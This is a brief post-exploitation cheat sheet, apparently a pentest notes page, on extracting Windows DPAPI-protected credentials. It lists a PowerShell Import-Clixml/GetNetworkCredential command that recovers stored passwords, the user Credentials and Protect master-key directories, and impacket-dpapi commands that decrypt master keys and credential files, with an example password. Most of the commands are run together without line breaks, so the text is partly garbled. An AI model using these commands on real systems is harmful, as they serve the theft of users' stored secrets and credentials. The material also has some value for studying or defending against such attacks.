dpapi-creds
Decrypting powershell credentials in the context of user or can abuse DPAPI
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'$credential.GetNetworkCredential().usernameAbuse dpai
dpaicmd /c c:\users\%USERNAME%\appdata\local\microsoft\credentials\cmd /c c:\users\%username%\appdata\roaming\microsoft\credentials\cmd /c c:\users\%username%\appdata\roaming\microsoft\protect\<user sid>c:\users\%username%\appdata\local\microsoft\protect\<user sid>impacket-dpapi masterkey -file <master key> -sid <user_sid> #-password Zer0The0neimpacket-dpapi credential -file <cred file> -key <obtained key>Last updated